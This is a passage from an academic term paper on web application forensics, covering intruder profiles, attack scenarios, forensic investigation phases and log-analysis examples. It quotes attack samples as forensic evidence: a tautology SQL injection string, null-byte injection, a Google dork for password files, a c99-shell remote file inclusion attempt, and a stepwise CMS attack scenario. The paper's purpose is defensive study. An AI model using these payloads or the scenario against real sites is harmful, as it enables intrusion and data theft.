  • 10. 2.Intruder profiles and Web Attacking Scenarios 2. Intruder profiles and Web Attacking Scenarios In the introduction part of this thesis is outlined that, the scientifically approved research, concerning Web Application Forensics by the Security and Scientific Communities, should be still considered as insufficient and as not well-established. That's why, an appropriate categorization of the different Forensic Fields and the correct allocation of WAFO in the Digital Forensics hierarchy are adequately appointed as required in the former chapter, which satisfies one of the objectives of the current paper. For all that, this classification does not present a complete fundamental basis for further academic research on WAFO. Therefore, we should extend the abstract Model, concerning WAFO, by introducing two other fundamentals: the profile of the modern Web intruder and methodologies as abstract schemae, current Cyber ( Web) attacks are accomplished by. Thus, we should follow the proposed schema for describing completely the aspects of WAFO, see the following Table: 1. represent the Digital Forensics hierarchy and 2. allocate the field of interest, concerning WAFO, 3. explain the Security Model, WAFO is observing, by: • designating the intruder, • describing the victim environment( Webapps), • specifying the fraudulent methods; 4. demonstrate the WAFO tasks, supporting the security remediation plan Table 2: A proposal for general taxonomic approach, considering the complete WAFO description In this way of thoughts, we should stress that, the intruders' attacks on existing Web Applications and other Web Implementations nowadays, should be denoted as highly sophisticated. Such Web attacks are rapidly adaptive in their variations and alternations, and in some cases precarious to be effectively sanitized. Example of such attacks like CSRF, Compounded SQLIA and Compounded CSRF are described in [4]. A good representative in this group is the famous Sammy worm, which is still wrongly considered to be a pure XSS Attack. Another confusing example demonstrate the Third Wave of XSS Attacks, DOM based XSS( DOMXSS) [20]. The fact that, DOMXSS attacks cannot be detected by IDS/ IPS, or WAF systems, if the payload is obfuscated as an URL parameter, e.g. Web Application server do not record HTML parameters in the log file, but only the primary URL prefix, should be designated as ominous. If the nature of such Attacking scenarios is fundamentally mistaken, then it is a matter of time that, attacks' derivatives should success in their further fraudulent activities on the Web. The task to sanitize a compromised Web application by CSRF is very difficult. It requires immense efforts of Reverse Engineering and Source Code rectification in reasonable boundaries for time and efficiency. The more general problem is, Web Applications are per se not stealth5. Thus, hardening a 5 Exceptions to these could be Intranet-Webapps, which designate another class of Webapps, concerning the term 11
  • 11. 2.Intruder profiles and Web Attacking Scenarios Webapp is not equivalent to hardening of a local host. In other words, the utilization of known preventive techniques, like security-through-obscurity, should be anted to secured Intranet Web applications, Admin Web Interfaces, non-public FTP servers etc., but commercial B2B Webapps, On-line Banking, Social Network Web sites, On-line magazines, WebMail applications and others. These last mentioned applications are meant to be employed from all over the world per definition; they exist, because of the huge amount of their users and customers per se. That's why, the securing of such Web constructs is more complex and intensive. Of course, there are basic and advanced authentication techniques applied to Web implementations, though these do not make the Webapp stealth for intruders. They just apply the so called user restriction for using sensitive parts of the Web implementation. In this way of thoughts, pointing out exaggerative cases of Web fraud like Child pornography and personal image offending issues, is only the top of the iceberg of examples for Web crime. The problem is, nowadays Identity Theft and speculations with sensitive personal data, should not be further categorized as exotic examples of existing Cyber crimes6 over the internet on Web Platforms. Such crimes designate an everyday persistence. Social networks, social and health insurance companies strive for more impressive Web representation. E-Commerce Platforms for daily monetary transactions are undeniable nowadays. We should not consider nowadays Web 2.0 as a hype, we should keep in mind that, the former dynamic E-commerce Web representations become nowadays sophisticated RIA Web platforms. Such Webapps respect the better marketing representation of the Business Logic of the firms, which profit depends at the present days on the complexity, rapidly changing dynamic adaption and more user-friendly features for satisfying the Web customer at any time. These aspects explain the huge intruders' interest for compromising Web applications, and furthermore Web Services as well. There is no kind of deterministic conclusions on the prediction of Web Attacking Scenarios, or the amount of the damage they cause every day. In [3], Robert Hansen compares the intensity of Web Attacks' representations and amount of damage they cause comparatively to the computer viruses. Both of the security topics should not loose attention of the Security communities for a long period of time. Moreover, as already stated, their remediation could not be ascertained straight-forward. As we know, there is no default approach for proper sanitization against computer viruses. The same statement is applicable for Webapp attacking scenarios. Rather, it is a matter of extensive 24/7/365 deployment of proper security hardening techniques and strategies, and the adaptive improvement of those. Knowing your friends is good, knowing your enemies is crucial. Let's proceed in this way of thoughts, after giving this conclusive explanation for the motivational purpose of the paper, with the representation of modern Web fraud in detail as follows. 2.1. Intruder profiling Two general categories should be designated in this section: the standard intruder profile and the profile of the intelligent intruder, performing terrible Cyber crime, short- intelligent intruder profile. We should use the adjective 'intelligent', describing the second intruder's profile, as very reasonable, respecting the fact- if we as representatives of the Security Communities, pretend to posses knowledge and know-how, concerning the proper deployment of our duties, this kind of intruders posses it too and much more. paper's definitions, where extensive intruder's effort is a pre-requirement for breaking the Intranet security, and should not be discussed here as relevant. 6 http://www.justice.gov/criminal/cybercrime/ 12
  • 12. 2.Intruder profiles and Web Attacking Scenarios There are also fuzzy definitions of intruders, which designate states in between the above mentioned ones. In fact, these profiles are very agile in their representation. For example- a 'former' intelligent intruder should be categorized better as a latent one, and a motivated standard attacker should not be disrespected. This violator could fulfill the requirements of the category, related to the intelligent intruder profile, at any time with sufficient likelihood. In the category of standard intruder we should determine: script kiddies and hacker wannabes, “fans” of YouTube, or other video platforms, capturing knowledge and know-how from easy how-to video tutorials. Bad configured robots and spiders, and any other kind of not well educated, not enough motivated, even not enough skilled daily violators. Specific for this group of intruders is the lack of personal knowledge and know-how, utilization of well known attacking techniques and scenarios well-established on the Web. Such violators are ignorant to and disrespecting the noise7 they produce, while trying to accomplish the attacks. These features explain the deduction- a standard attacking scenario, could be sanitized in greater likelihood with standard prevention and hardening techniques( best-practices). In cases of successfully deployed attack(s) on behalf of such standard scenarios, the investigation and detection approaches could be considered as standard with greater likelihood too. For all that, there are cases, which represent attacking scenarios, designated as shadow scenarios. It is not important, whether these are accomplished successfully, or not at the specific time of the attack's deployment. Their utilization is to cover the deployment of the real attacking scenario. That's why, we should rather concern, whether these are cases of intelligent intruders' attacks. The group of intelligent intruders should deliberate: 'former' ethical hackers; pen testers; security professionals, who have changed sides, disrespecting their duties; intelligently set up automated tools for Web Intrusion, such as Web Scanners, Web Crawlers, Robots, Spiders etc. The most notable feature describing these representatives is the possession of inferior independent knowledge and know-how. Furthermore, patience, accuracy in the accomplishment of the attacking scenario deployment, strive to learn and assimilate new know-how. Interesting examples, related to this profile, are given at [3]. We should mention some types of such ones. Intelligent hackers are recruited by law firms to achieve a Proof of Concept( PoC) on a targeted Web implementation. If the PoC is positive, this could alter the outcome of the legal case, as this PoC could be used as decisive juristic evidence in most of the situations in account of the hacker recruiting law firm. Such intruders' attacks are difficult to be detected right on time. Furthermore, there are other cases, where the damage of the accomplished attack is the determinant alarm after havoc is consequently presented. As already stated, the sanitization of the compromised Web Application(s) after such successful attacks is in some cases unfeasible and more often requires sophisticated methods to be achieved. Examples of these are CSRF compromised Webapps, like the case: PDP GMail CSRF attack8, see also [4]. Therefore, reasonable supportive part to the accurate sanitization of the compromised Webapp, demonstrates the proper deployment of Web Application Forensics investigations. Let's mention several examples of modern Web Attacking Scenarios in the next section of Chapter 2. 7 We should emphasize here: the Communication Complexity and amount of false positive attempts by the violator(s) in their strive to complete the intended Web attacking scenario(s), which should not be mistaken with the utilization of attacking techniques, where producing communication noise is the core of the attacking strategy, like different DDoS implementations: Fast Fluxing SQLIA, DDoS via XSS, DDoS via XSS with CSRF etc. 8 http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/ 13
  • 13. 2.Intruder profiles and Web Attacking Scenarios 2.2. Current Web Attacking scenarios In May, 2009 Joe McCray9 concludes in his presentation [9] on 'Advanced SQL Injection' at LayerOne10, that Classic SQLIA should no more be categorized as a trend or conventional. In [4] Classic SQLIA are discussed as a part of the current SQLIA taxonomy till 2010. Despite the fact, their categorization by Joe McCray should be respected as reasonable. This controversial issue is presented at many of the current Web Attacking Vectors. To achieve a complete taxonomic approach, pertaining to a concrete Webapp Attacking vector, many obsolete representations of the Attacking sub-classes should be illustrated, revering the real Web Environment. The mentioned above Classic SQLIA illustrate obsolete and more over unfeasible Attacking Techniques, considering the properly employed modern defensive methods. The main reason, explaining this issue is- Web platforms are vastly changing, not only according to its development aspects, but rather the attacking and security hardening scenarios, anted to them. Most likely, an intelligent intruder should not use obsolete techniques, because of the expectant presence of Web Application security protection. Detecting deployment of obsolete Attacking Scenarios on a modern Web construct, could be classified as an investigation on the standard intruder's profile. Nevertheless, this conclusion should not be underestimated, as previously discussed, see shadow scenarios. Let's give some interesting examples of current successful accomplished Web Attacks. In July, 2009 a dynamic CSRF Attack is accomplished on the Web Platform of Newsweek [4], [L4]. The Tool, called MonkeyFist11, utilized for this first completely automated CSRF Attack, represents a Python- based small web server, configured via XML. The victim site is been already hardened via protecting of the generation of its dynamic elements by security tokens12 and strong session IDS. For all that, this new attacking technique achieves positive results, which designates open questions, concerning the impact of the 'See surfing' sleeping giant. Another recent attack is the SQLIA over the British Navy Website[L5] in November, 2010, which was only meant to be a PoC by a Romanian hacker, that Web Application Security can be broken even at such high-level hardened Web Implementations. In April 2011, different mass infection by SQLIA is detected. 28000 Web sites are compromised, even several Apple Itunes Store index sites are infected. The SQLIA injects a PHP script, which redirects the user to a cross-origin phishing site, pretending to deliver an on-line Anti-Virus( AV) protection. The attack is known in the Security Communities as LizaMoon Mass SQLIA13 [L6]. The list of such impressive Web Attacking incidents can be proceeded, which should not be enumerated further in the paper. The interested reader should refer further to : • The Web Hacking Incidents Database14 • OWASP Top Ten Project15 9 http://www.linkedin.com/in/joemccray 10 LayerOne- IT- Security conference, http://layerone.info 11 http://www.neohaxor.org/2009/08/12/monkeyfist-fu-the-intro/ 12 The anti-CSRF token is originally suggested by Thomas Schreiber, in 2004: www.securenet.de/papers/Session_Riding.pdf 13 http://blogs.mcafee.com/mcafee-labs/lizamoon-the-latest-sql-injection-attack 14 http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database 15 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project 14
  • 14. 2.Intruder profiles and Web Attacking Scenarios At the end of this Chapter let's deliberate some interesting trends, concerning the current Web Attacks. 2.3. New Trends in Web Attacking deployment and preventions Discussing the deployment of Web Attacks, we should consider a more realistic approach, for categorizing Web Attacking Vectors. As mentioned above, there are two general profiles of the Web Intruders. Keeping in mind, the differences of the Attacks' deployment and the level of Attacks' sophistication, it should be more appropriate to discuss the accomplishment of Web Attacking Scenarios, rather than the deployment of Web Application Attacks. In such Attacking Scenarios, which represent a fundamental construct, the Web Attacks should be denoted as execution techniques in a given attacking setting. This allows us to define single layer attacks, multi-layer attacks, and special attacking sequences as specific implementations in the realization of the Web Attacking Scenario. Such scenarios can adequately illustrate the intention of the different profiles of Web Intruders. In distinction to the intelligent Web Intruder, the standard Intruder tries to accomplish a simple attacking scenario, reduced to the utilization of a special Web attacking technique. The Web attacking scenario represents a simple deployment construct: try a well- established attacking procedure(s) and wait for result(s), no matter what. As mentioned above, the intelligent Intruder utilizes more sophisticated scenarios. Some of them could be planned and sequentially accomplished in a long period of time, till achieving the expected result(s). There are cases in which the intelligent attacker could gain enough feedback from the victim application and thus intentionally reduce the attacking scenario to the deployment of one or a compact amount of attacking techniques, which resembles the scenario to the level of the standard intruder's scenario. Nevertheless, important aspects like utilization of non-standard attacking techniques and less noise at the attacking environment obviously discern the one profile from the another. These conclusions should be extended in the Chapters, concerning the more detailed representation of WAFO. Let's illustrate the Web Application Scenario construction in the next Figure: Figure 2: Web attacking scenario taxonomic construction 15
  • 15. 2.Intruder profiles and Web Attacking Scenarios The proposed construct should be extended in the next Table, which denotes an example of a possible Web attacking scenario: Example Attack on well-known CMS [inject c99 shell on the CMS, as a paradigm] Scenario • What is the particular goal: PoC, ID Theft, destroying Personal Image etc. • determine the CMS version, • determine the technical implementation type: concurrent attacking, or sequentially attacking of specific Webapp modules • localize the modules to be compromised: Web Front-end, RDBMS, WebMail interface, News feeder etc. • if CMS version obsolete: • find published exploits( at best 0days16) and utilize them to gather feedback from the victim environment • respect scanning noise as low as possible • if version is up-to-date utilize: • blind application scanning techniques with noise reduction and wait for positive feedback • analyze the results and proceed with further more specific attacking techniques • if success, utilize a refinement of the attack and if of interest, wait for CMS admins reaction- gives feedback on sanitization response time, efforts, utilized hardening techniques etc. • if not successful: • audit the gathered feedback • wait for new published 0day exploits • develop a 0day(s) independently • utilize an scenario sequence execution loop till achieving the goal with respect to: • ( communication) attacking noise • and...try to stay concealed Technique(s) XSS: SQLIA: CSRF CSFU Particular ... Common well- (these should * NP-XSS17 * error 0day(s) established be ordered, or * P-XSS response like: reordered * timing sniffing for open according the SQLIA ... admin debugging attacking console access on scenario) port 1099 Procedures NP-XSS: Error response SQLIA: ... ( these should • detect dynamic modules on the Webapp, • Step 1, be ordered, or • find variables to be compromised, • Step 2, reordered as • craft the malicious GET- Request and appropriate) taint the input value of the variable to be • … exploited • Step n; • gather feedback • resemble the procedure till expected results are achieved • spread the malicious link to as many as possible 'Confused Deputies'[4] Table 3: Example of possible Webapp attacking scenario 16 http://netsecurity.about.com/od/newsandeditorial1/a/aazeroday.htm 17 NP- XSS denotes non-persistent XSS; P-XSS abbreviates the Persistent XSS 16
  • 16. 2.Intruder profiles and Web Attacking Scenarios How this respects the proposed profiles of modern Web intruders, should be illustrated as: Profile Standard Intruder Intelligent Intruder Attacking Scenario static: highly dynamically adaptive18 execution remains on the level of published and well-established 'Web attacks' Techniques static: could remain static, but preferably (as a comment: … better watch it on the Cyber criminal would adapt YouTube19, see [4]) according the successful completion of the Attacking Scenario Procedures static: Could be static, but preferably the “... just copy and pase”, Intruder should seek for a 0day(s) 0day with less likelihood Table 4: Standard vs. Intelligent Web intruder Another important aspect, respecting the prevention and sanitization of successfully deployed Web Application Attacking Scenarios, is illustrated by Rafal Los20 in his presentation at OWASP AppSecDC in October, 2010 [10]. Main topic of his research, concerns the Execution-Flow-Based approach as a supportive technique to the Web Application security (pen-)testing. The utilization of Web Application scanners( WAS) should be determined as impressive, supporting the pen-testing job of the security professional/ ethical hacker and not to forget the intelligent intruder [11], [4]. Indeed, WAS can effectively map the attacking surface of the Webapp, intended to be compromised. Still, open questions remain, like- do WAS provide full Webapp function- and data-flow coverage, which reports greater feedback, concerning a complete security auditing of the Web construct in detail. Most of the pen-testers/ ethical hackers, do not care what kind of functions, related to the Webapp, should be tested. If they do not exactly know the functional structure and the data-flow of the Web Application, how should they consider appropriate and complete functional coverage during the pen-testing of the Webapp? The job of the pen-tester is to reveal exploits and drawbacks in the realization of a Web Application prior to the intelligent intruder. Consequently to this, appears the next question, what are the objective parameters to designate the pen-testing job completed and well-done? As Rafal Los states, nowadays the pen-testing of Webapps, utilizing WAS, should be still digested as “point'n'scan web application security”. The security researcher suggests in his presentation that, a more reasonable Webapp hardening approach is the combination of the Application function-/data-flow analysis with the consequent security scanning of the observed Web implementation. A valuable comparison between the Rafal Los' indicated approach and the common security testing of Webapp(s), outlining the drawbacks of the second one, is given in Table 9, Appendix A. 18 Respecting the current level of sanitization know-how, produced attacking noise, reactions of the security professionals to sanitize the particular Webapp, the specific goal for compromising the victim Webapp 19 The author of the paper do not intend to be offensive to YouTube, nevertheless the facts are: this video on-line platform is well-established and popular, there are tons of videos, hosted on it, concerning: Classic SQLIA derivatives, XSS derivatives etc., which could be easily found and utilized by script kiddies, hacker wannabes ... 20 http://preachsecurity.blogspot.com/ 17
  • 17. 2.Intruder profiles and Web Attacking Scenarios Let's summarize these drawbacks, as follows. The current Webapp pen-testing approaches via scanning tools do not deliver adequate functional coverage of modern and dynamic high sophisticated Web Applications. Furthermore, the Business Logic of the Webapp(s) is often underestimated as a requirement for the proper pen-testing utilization. A complete coverage of the functional mapping of the Web Application could still not be approved. If the application execution flow is not explicitly conversant, the questions, regarding completeness and validity of the results from the tested data, should be denoted as open. Therefore, Rafal Los suggests, utilization of Application-Flow Analysis( AFA) in the preparation part prior to the deployment of the specific Web Application scanning. This combination of the two approaches should deliver better results than those from the blind point'n'scan examinations. Explanation of this approach is illustrated in Figures 16, 17 and Tables 10, 11, 12, given at Appendix A. For more information, please refer to [10], or consider studying the snapshot of the live presentation[L7]. We should designate these statements as highly applicable for the better utilization of WAFO, as well. The lack of complete and precise knowledge of the functional structure and data flow of the forensically observed Webapp, should definitely detain the proper and accurate implementation of WAFO. We should keep in mind these conclusions and extend them in the following Chapters of the paper. Let's proceed with the more detailed representation of the Web Application Forensics. 18
  • 18. 3.Web Application Forensics 3. Web Application Forensics The main task, this Chapter represents, is to proceed further with the taxonomic description of WAFO, by describing the victim environment, e.g. to designate in detail the Web application in production environment. This should be specifically utilized on behalf of the facts: explaining, how Webapp forensics is applied to this environment; determining, what are the main concerning aspects to WAFO; establishing these statements via particular examples and outlining collaborative techniques, which extend the proper WAFO investigation. See again Table 2. We proposed in the former Chapters that, utilizing WAFO on behalf of best practices and only should not be considered as reasonable. Presuming this, we should emphasize further explicitly that, trial-and-error approaches and conclusions,relying on personal experience and high-level skills, can not be approved as sufficient requirements for proper WAFO deployment. On the one hand we discover high information abundance, concerning the prior discussed complexity aspects of RIA Webapps, on the other the impulse for applying appropriate WAFO on these high-level sophisticated applications is immense. Once again, this confirms the need for proper taxonomy- not best-practices, presenting a recipe shaping of the Web Application Forensics investigation, but categorizations, approved to be universally valid and compact in their representation. Let's conclude the illustration of the Webapp forensics' categorization and extend the described taxonomic aspects heretofore. Respecting the post mortem strategies, after intruder's attack is successfully accomplished and damage is presented, we specify two general approaches for Webapp sanitization- Incident Response( IR) and Web Application Forensics. In a word, the differences between them, should be outlined as follows. The remediation scenario, applied to the compromised application and focused on the regaining of the implementation's complete functionality, is the main concern of the Incident Response. In distinction to this, the Forensics investigation focuses on gathering the maximum collection of evidence, which is relevant for the IR utilization and should be employed to a court of jurisdiction, if required. Let's demonstrate the complete overview of the Digital Forensics structure and point out the dependencies between IR and CFO, as well as, the dependencies between WAFO and the other Forensics fields. This is illustrated in the next Figure 3. 19
  • 19. 3.Web Application Forensics Figure 3: Digital Forensics: General taxonomy For the reader concerned, please refer to [12], where IR and Forensics approaches are compared in detail. More general representation on the topics IR and Forensics should be found at [1], [13], [14]. In this way of thoughts, we should derive and should specify the following fundamental questions( *), concerning WAFO: 1. how can we describe an environment as ready for Forensics investigations, 2. what evidence should we look for and 3. what is the definition of their location, 4. how can we extract the payload of the Forensics evidence raw data, concerning its proper application in the further steps of IR. Let's designate the general procedure in the implementation of WAFO. The next Figure 4: 20
  • 20. 3.Web Application Forensics Figure 4: WAFO phases, in Jess Garcia[1] This illustrates, respecting the universal validity, the following steps in the WAFO deployment: • seizure- the problem should be designated, • Preliminary Analysis- preparation for the specific WAFO investigation, • Investigation/ Analysis loop- analyzing the collected evidence and proceeding in this manner till the collection of those is maximal and complete In this way of thoughts, we should underscore the Standard Tasks, WAFO is utilizing, as in [15]: 1. Understand the “normal” flow 2. Capture application and server of the application configuration files 3. Review • Web Server 4. Identify • Malicious input from client log potential • Breaks in normal web files: anomalies: access trends • Application • Unusual referrers Server • Mid-session changes to cookie values • Database Server 5. Determine a remediation plan • Application Table 5: Web Application Forensics Overview, in [15] Let's categorize the evidence, as an argumentation to the second fundamental question, see (2,*), in Table 6: 21
  • 21. 3.Web Application Forensics Digital Forensics evidence: • Human Testimony • Peripherals • Environmental • External Storage • Network traffic • Mobile Devices • Network Devices • … ANYTHING ! • Host: Operating Systems, Databases, Applications Table 6: A general Taxonomy of the Forensics evidence, in [1] To specify the source of the different Forensics evidence, see (3,*), we should clarify the 'Players', as Jess Garcia in [1], contributing to the Layer 7 communication as follows, see Table 7: Type of 'Players': … and their Implementation in the Web traffic: Network Traffic Common Operating Systems Client Side ( Web) Browsers Web Servers Server Side Application Servers Database Servers Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1] A reasonable WAFO should present an inspection/ analysis of all evidence these 'Players' produce, which consists of: inspecting the Network traffic logs( inspecting logs of supportive Applications as NIDS, IDS, IPS), analysis of the hosts OS logs( incl. HIPS, HIDS, Event logs etc.), header and cookie inspection of the users' Browsers, inspection of the Server logs, belonging to the Web Application Architecture, cache inspection etc. As we propose in the former Chapter 2, this should not be a simple task, especially when the Webapp is highly process-driven( e.g. AJAX, Silverlight, Flash etc.). This should require additional application-flow analysis, which considers an explicit knowledge, respecting the functional- and data- flow map of the Webapp. The human factor should not be underestimated in this regard. Finally, there is also the important matter of the legal aspects, related to the deployment of the WAFO investigation, which the security professional should be aware of and should maintain during the Web Application Forensics process. We should not discuss this matter in detail. The interested reader should find more information, concerning this topic at [16] and also, as already proposed, in [7]. With respect to the forth fundamental question, see (4,*), focusing on the evidence payload extraction, we should discuss this more detailed in the next Section 3.1. of this Chapter. To conclude this discussion, we should consent to argue the leading fundamental question, pointing out the Forensics readiness concerns, see (1,*). 22
  • 22. 3.Web Application Forensics An environment, which is not prepared for Forensics investigation in an appropriate manner: • application logging is not present or not adequate adjusted, • no kind of supportive forensic tools are applied to the WAFO environment( IDS/ IPS etc.), • users are not well trained for Forensics collaboration; could detain the Web Application Forensics investigation in a way that, the evidence collection is considerably incomplete and WAFO could not be anted to the environment, at all [1]. That's why, the matter of Forensics Readiness should be approved as fundamental in the taxonomy of WAFO, concerning the Preliminary Analysis phase of the Web Application Forensics deployment. An illustrative example of the Forensics Readiness, should be found in [13], referenced in Appendix A, Figure 18. As we specified the general taxonomy, respecting WAFO victim environment, let's proceed with further examples, designating the deployment of different Web Application Forensics techniques. On one hand, they demonstrate in a more illustrative manner the paper's exposition; on the other, refer to the reasonable question argumentation on how WAFO payload data is gained from evidence in practice. 3.1. Examples of Webapp Forensics techniques In this Section we should describe different cases of WAFO deployment, concerning Client Side and Server Side forensics analysis, on given real-life examples, organized as follows: main topic, possible attacks, WAFO techniques illustration. Extraneous White Space on the Request Line This example is discussed in [3], which provides evidence for anomalies in HTTP requests, stored in the Webapp server log. The whitespace between the requesting URL and the protocol should be considered as suspicious. In the next Figure is illustrated a poorly constructed robot, which obviously intends to accomplish a remote file inclusion: Figure 5: Extraneous White Space on Request Line, in [3] Google Dorks Exploiting the Google search capabilities, may be illustrated with the next search query [3]: 23
  • 23. 3.Web Application Forensics intitle:”Index of” master.passwd The produced evidence should appear in the server logs as follows: Figure 6: Google Dorks example, in [3] The author of the book [3] states, that such requests are still very un-targeted, because of the fact that such requests are chaotic, in term of, the target is not explicitly specified in the search query. Nevertheless, they should not be considered underestimated. In respect to this, follows the next example, produced by spammers, utilizing the Google search engine for the same purpose: Figure 7: Malicious queries at Google search by spammers, in [3] Faking a Referring URL A great21 job for faking Referrer URL22 credentials is done by spammers. In the next example the faked part of the URL is presented in the anchor identifier, which is unique for accessing different parts on the displayed web page content. Such GET requests should not be approved as valid log file entries via clicks on the Web page, because the Web server reproduces the whole Web page and do not matter explicitly about its content, thus such log entry should be determined as malicious and , once again to be mentioned, not produced by a regular Web surfing activity: Figure 8: faked Referrer URL by spammers, in [3] Remote File Inclusion A good example for Common Request URL Attacks could be illustrated by the next Remote File Inclusion( RFI)23 attempt stored in the Web Server log: Figure 9: RFI, pulling c99 shell, in [3] The attempt to pull the well known c99 shell on the running machine on behalf of a GET Request is obvious. The c99 shell is classified as a malicious PHP backdoor. There is a great likelihood that, Web intruders try to inject and execute such kind of code on Open Source PHP Webapps, like different PHP-based CMSes, or PHP-forums. In most cases RFIs are deployed to extend the structure of compromised machines and support the utilization of botnets. 21 'great job' in terms of, discussing the algorithmic approach as security professionals and by no means as favoring the malicious intentions of the Cyber criminal 22 RFC 1738 23 http://projects.webappsec.org/w/page/13246955/Remote-File-Inclusion 24
  • 24. 3.Web Application Forensics Another reason for RFI is the attempt to execute code on compromised machine and gain access to sensitive data on it. A simple Classic SQLIA The following general example illustrates the utilization of SQLIA [4] on a PHP Webapp on behalf of a malicious GET request: Figure 10: Simple Classic SQLIA, in [3] The intruder tries to compromise the 'admin' account on the Webapp, utilizing Tautologies Classic SQLIA: ' password= ' or 1=1 - - '. To utilize: the apostrophe, the white spaces and the equals sign ASC II characters, in the GET request, these are substituted as follows: %27, %20 and %3D, via their URL Encoding representatives. NULL-Byte-Injection A NULL-Byte-Injection( NBI)24 could be also accomplished on behalf of a GET Request, as: Figure 11: NBO evidence in Webapp log, in [3] In the same manner as in the former example the Null ASC II character is URL encoded here by %00. The attack tries to compromise the Perl login.cgi -script and utilizing the NBI to open the sensitive .cgi file. The provided examples illustrate different header inspection cases as part of the Server Side Forensics. This list can be extended by further paradigms, related to user client Browser investigation techniques: Browser Session-Restore Forensics [17] and Cookie inspection etc. Though, we should not consider further illustrations of WAFO techniques in this section, with respect to the marginal boundaries of the term paper. The interested reader should refer to [3] and [15] for more information. Let's proceed with an example, concerning the WebMail forensics. 3.2. WebMail Forensics Web based Mail( WebMail) represents a separate construct in an Web Application. Furthermore, many firms deploy Web based mail services, like: Yahoo, Amazon etc. Moreover, the WebMail denotes another data input source on a Webapp, therefore, the strive for compromising Web based Mail implementations still matters. The next Figure 12 illustrates a faked ( spam) e-mail: 24 http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection 25
  • 25. 3.Web Application Forensics Figure 12: HTML representation of spam-mail( e-mail spoofing) This should designate the last case study in the examples exposition. The spam-mail should be considered as representative of one of the most utilized attacking techniques, concerning WebMail- e-mail spoofing. We should illustrate according to this a fragment of the mail header, see Figure 13: Figure 13: e-mail header snippet of the spam-mail in Figure 12 26
  • 26. 3.Web Application Forensics Furthermore, a diffrent supportive attacking technique designate the e-mail sniffing, which should not be discussed in this paper. For the reader concerned, please refer to [18], [19]. The Author of the paper receives the illustrated spam-mail in January 201125. Let's demonstrate a WebMail header inspection on the given example, as in Figure 13 already shown, which should explain the e-mail stuffing attempt. On one hand, inspecting the Received- header the domain appears to be valid and belongs to facebook.com26; on the other, the Return-Path- header, as well as the X-Envelope- Sender- header reveal a totally different sender. The domain, specified there, appears to belong to a home building company in the US. Moreover, there is another domain very similar to the one in the example: 'cedarhomes.com.au'. Inspecting as next the Sender header, the sender name appears to be a common name in Australia27. The correlation of the evidence is illustrative. More important, the e- mail-spoofing attempt is identified. A different crucial matter also concerns the discussed spam-mail. A more detailed investigation on the HTML- content of the spam e-mail, provoked by the suspicious appearance of the Hyper-Link 'here', as in Figure 12, the second row from the bottom of the HTML mask: '…, please click here to unsubscribe.'; reveals the following dangerous HTML-Tag content, see next Figure: Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12 It appears to be that, the spam-mail is intelligently devised, as the intruder is not actually interested only in spamming the e-mail accounts. With greater likelihood, a receiver, who does not use social platforms, or just dislike to receive such e-mails, should click on the un-subscribing link, which should lead him to a malicious site. Modern versions of Mozilla Firefox Browser can detect the compromised and malicious domain 'promelectroncert.kiev.ua' and warn the Browser user right on time,as appropriate. This interesting example illustrates the argumentation, explaining why should WebMail Forensics matter. Thus, we conclude this section and proceed to the last part of this Chapter 3, concerning aspects on collaborative approaches from the other Forensics investigation fields, supporting WAFO. 3.3. Supportive Forensics In this section we should discuss briefly the supporting part of Network, Digital Image and (OS)- Database Forensics, extending the evidence collection for WAFO investigation. The presence of log data, derived from IDS/IPS prevention systems, supports the more precise detection of the intruders' activities on the Webapp and IP provenance. The amount of noise over the network, the intruder produces, is sufficient as described formerly, to determine properly the violator's profile. In some cases, Forensics investigations on digital images uploaded to a compromised Web Application should lead to the successful detection of the intruders' origins. 25 At this point,the author of the paper should like to express his gratitude to Rechenzentrum at Ruhr-University of Bochum, for the successful sanitization of the spam-mail, utilizing spam-assassin right on time, http://www.rz.ruhr-uni-bochum.de/ , http://spamassassin.apache.org/ 26 http://www.mtgsy.net/dns/utilities.php 27 http://search.ancestry.com.au 27
  • 27. 3.Web Application Forensics This denotes once again the reasonable suggestion for extensive correlation of the different payload as forensic evidence, which should reduce false positives appearances in the results and consequently to this, more precise attacking detection should be achieved. A very interesting example is pointed out in [3], page 285, concerning the Sharm el Sheikh Case Study. At last, we should also mention the notable case, in which WAFO is detained, because of the lack of sufficient Database log data. Root for such issues could be: the proper utilization of concealing techniques a Web intruder applies to cover the attacks' traces, malfunction in the Database engine, lack of proper WAFO Readiness utilization- logging capabilities of the RDBMS are not adequate adjusted etc. In such cases the WAFO successful examination of compromised RDBMS as a Back- End to a Webapp is constitutive doubtful. Nevertheless, if the RDBMS Application Server has not been restarted since the time prior to the moment as the Attacking Scenario is executed, there is a reasonable chance to extract important forensic evidence from the RDBMS plan cache. This essential approach is discussed in detail in [16]. We discuss in this Chapter techniques for deployment of WAFO, which should be considered as manual techniques. If the observed environment is compact and the amount of sufficient evidence, could be examined by a human in acceptable time and efforts, expanding the collection of such forensic techniques is undeniably fundamental and relevant. For all that, there are many cases, concerning modern Webapps, in which the observation of the log files exceeds the human abilities, like the capacity of logs provided by Web Scanners equal to a couple of Gigabytes[L8]. Another example is the utilization of WAFO investigation accomplished rapid in time. In such cases the questions, concerning the utilization of automated tools, enhancing the deployment of Webapp forensics, become undoubtedly significant. Let's introduce in the next Chapter 4 such tools, respecting WAFO automation techniques. 28
  • 28. 4.Webapp Forensics tools 4. Webapp Forensics tools In [13], Jess Garcia proposes a categorization of the Forensics approaches, separating them in two classes: Traditional forensics methods and Reactive forensics methods. A good illustration of the main parameters, designating the two classes, is represented in the next Table, derived from [13]: Traditional Forensics Approaches: Reactive Forensics Approaches: • Slow • Faster • Manual • Manual/ Automated • More accurate( if done properly) • Risk of False Positives/ Negatives • More forensically Sound • Less forensically Sound( ?) • Older evidence • Fresher evidence Table 8: Traditional vs. Reactive forensics Approaches, in [13] According to the examples in Chapter 3, we should clarify that, the detection of those could be established only by well trained security professional in acceptable matter of time. Manually deployed WAFO investigations should be determined as very precise with less false tolerance, though only if applied appropriate. As mentioned above, the complexity of the current Web Attacking Scenarios drives the investigation process to be unacceptable, respecting the time aspect. Business Webapps do not tolerate down-time, which is undoubtedly required that, the Webapp image should be processed for reasonable WAFO. This designates the dualistic matter of Web Application Forensics investigation: slow and precise versus faster and error prone. On one hand WAFO should be deployed uniquely for every single case of compromised Webapp, on the other the utilization of new techniques, as employment of automated tools in the WAFO investigation, should gain without a doubt new( 'fresher') forensic evidence. This is very 